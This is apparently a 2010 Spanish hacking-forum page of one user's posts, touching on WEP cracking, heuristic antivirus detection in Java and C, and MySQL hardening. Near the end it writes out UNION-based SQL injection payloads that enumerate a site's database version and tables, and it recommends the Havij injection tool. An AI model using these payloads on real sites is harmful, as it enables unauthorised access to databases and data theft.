Jeje no esta mal, podrias pasarlo a PDF y haces un mini-how to sobre cracking wep.
Saludos
Saludos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCita de: ddk en 28 Agosto 2010, 04:34 AMPor consecuencia, ya no seri un Antivirus jeje, java tiene que evolucionar en ciertos aspectos para lograr esas cosas.
¿Un antivirus en Java? Se puede, pero seria casi inútil.
Cita de: hack-4-life en 26 Agosto 2010, 23:43 PMExactamente lo que te comentaba, heurística significa a grandes rasgos, detectar leyendo la memoria del proceso o ejecutable que funciones usa y si son dañinas, como las aplica, si hay conexión remota sin autorización, y eso lo suyo es hacerlo en C, en ASM si te quieres romper el coco un poco adelante, pero yo te recomiendo C.
gracias por tu respuesta ,me podrias explicar mas o menos en que consiste lo de heuristica si se que son tecnicas para deteccion de virus pero cual seria el problema con JAVA,he estado leyendo y he ncontrado que desde java no Te deja acceder a la maquina virtual tener control total,y lei que en visual basic que no se recomienda por que ocupa muchas librerias ajenas,que el mejor es mezclar C++ y tal vez ASM lenguaje ensamblador... que me dicess..espero tu respuestaa.saludos XD
Cita de: tragantras en 26 Agosto 2010, 01:44 AMMuchas gracias por la información
la práctica de actualizar el software es FUNDAMENTAL, el hecho es que con más funcionalidad vienen más peligros.
el acceso a information_schema NUNCA debería ser posible desde un usuario creado para una web, de hecho solo debería poder acceder a la tabla para la cual ha sido creado, separando la de login, y sobre todo SOLO selects, nada de updates blablablá
te recomiendo usar "Havij" es un programa muy útil, te comprueba automáticamente la existencia de ciertas tablas, viene con su propio diccionario y peude ser aumentado facilmente.
así mismo para todos:
http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-13.html
http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-23.html
Cita de: LEYER en 25 Agosto 2010, 22:28 PMOsea que pruebe nombres de tablas a lo loco?
information_schema.tables no esta en la version 4 tendras que hacerlo a ciegas XD
noticias.php?id='1
noticias.php?id=-1+union+select+1,2,3,4,5,6,7--
noticias.php?id=id=-1+union+select+1,@@version,3,4,5,6,7--
noticias.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--
CitarError : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(table_name),3,4,5,6,7 from information_schema.tables--' at lin